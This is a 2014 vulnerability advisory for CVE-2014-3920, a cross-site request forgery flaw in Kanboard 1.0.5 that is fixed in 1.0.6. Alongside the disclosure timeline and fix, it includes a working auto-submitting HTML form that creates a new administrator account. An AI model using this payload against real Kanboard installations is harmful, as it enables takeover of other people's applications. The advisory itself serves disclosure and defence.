Cross-site request forgery (CSRF) vulnerability in Kanboard before 1.0.6 allows remote attackers to hijack the authentication of administrators for requests that add an administrative user via a save action to the default URI.
Product: Kanboard
Vendor: http://kanboard.net/
Vulnerable Version(s): 1.0.5 and probably prior
Tested Version: 1.0.5
Advisory Publication: May 28, 2014 [without technical details]
Vendor Notification: May 28, 2014
Vendor Patch: June 30, 2014
Public Disclosure: July 2, 2014
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
CVE Reference: CVE-2014-3920
Risk Level: Medium
CVSSv2 Base Score: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered vulnerability in Kanboard, which can be exploited to perform Сross-Site Request Forgery (CSRF) attacks and gain complete control over the vulnerable application.
1. Сross-Site Request Forgery (CSRF) in Kanboard: CVE-2014-3920
The vulnerability exists due to insufficient verification of the HTTP request origin. A remote attacker can trick a logged-in administrator of Kanboard to visit a specially crafted web page with CSRF exploit code and create new account with administrative privileges.
Simple CSRF exploit below creates new admin account with login "immuniweb" and password "password":
<form action="http://kanboard/?controller=user&action=save" method="post" name="main">
<input type="hidden" name="username" value="immuniweb">
<input type="hidden" name="name" value="name">
<input type="hidden" name="email" value="[email protected]">
<input type="hidden" name="password" value="password">
<input type="hidden" name="confirmation" value="password">
<input type="hidden" name="default_project_id" value="0">
<input type="hidden" name="is_admin" value="1">
<input type="submit" id="btn">
</form>
<script>
document.main.submit();
</script>
-----------------------------------------------------------------------------------------------
Solution:
Update to Kanboard 1.0.6
More Information:
http://kanboard.net/news
# 0day.today [2018-01-01] #